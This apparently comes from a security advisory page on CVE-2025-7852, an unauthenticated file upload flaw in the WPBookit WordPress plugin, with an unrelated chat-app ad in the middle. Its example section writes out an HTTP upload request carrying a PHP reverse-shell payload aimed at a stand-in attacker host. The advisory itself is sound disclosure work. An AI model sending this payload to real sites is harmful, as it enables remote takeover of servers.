Overview
CVE-2025-7852 is a critical security vulnerability that affects the WPBookit plugin for WordPress, which is used widely for managing bookings on WordPress sites. This vulnerability allows unauthenticated attackers to upload arbitrary files on the server of an affected site due to a lack of file type validation in the image_upload_handle() function. The severity of this vulnerability lies in the fact that it can potentially lead to a system compromise and data leakage, making it a significant threat for any WordPress site running the vulnerable version of the WPBookit plugin.
The vulnerability has been attributed a high CVSS severity score of 9.8, highlighting the urgent need for affected users to apply the vendor patch or use Web Application Firewalls (WAF) or Intrusion Detection Systems (IDS) as temporary mitigation measures.
Vulnerability Summary
CVE ID: CVE-2025-7852
Severity: Critical (CVSS: 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
WPBookit Plugin for WordPress | Up to and including 1.0.6
How the Exploit Works
This vulnerability stems from an insecure file upload handler function within the WPBookit plugin. Specifically, the image_upload_handle() function, which is hooked via the ‘add_new_customer’ route, lacks adequate file type validation. This makes it possible for an unauthenticated attacker to upload any type of file without restriction. The function calls move_uploaded_file() on client‐supplied files without restricting allowed extensions or MIME types, nor sanitizing the filename. This allows an attacker to upload a malicious file, potentially leading to the execution of arbitrary code on the server.
Conceptual Example Code
The following is a conceptual example of how an attacker might exploit this vulnerability. It illustrates a malicious HTTP POST request that an attacker could use to upload a script disguised as an image file.
POST /add_new_customer HTTP/1.1
Host: vulnerable-wordpress-site.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="evil.php.jpg"
Content-Type: image/jpeg
<?php exec('/bin/bash -i >& /dev/tcp/attacker-ip/8080 0>&1'); ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--In this example, the attacker attempts to upload a file named “evil.php.jpg”. Although it appears to be an image file, it is actually a PHP script that, once uploaded and executed, can give the attacker remote control over the server.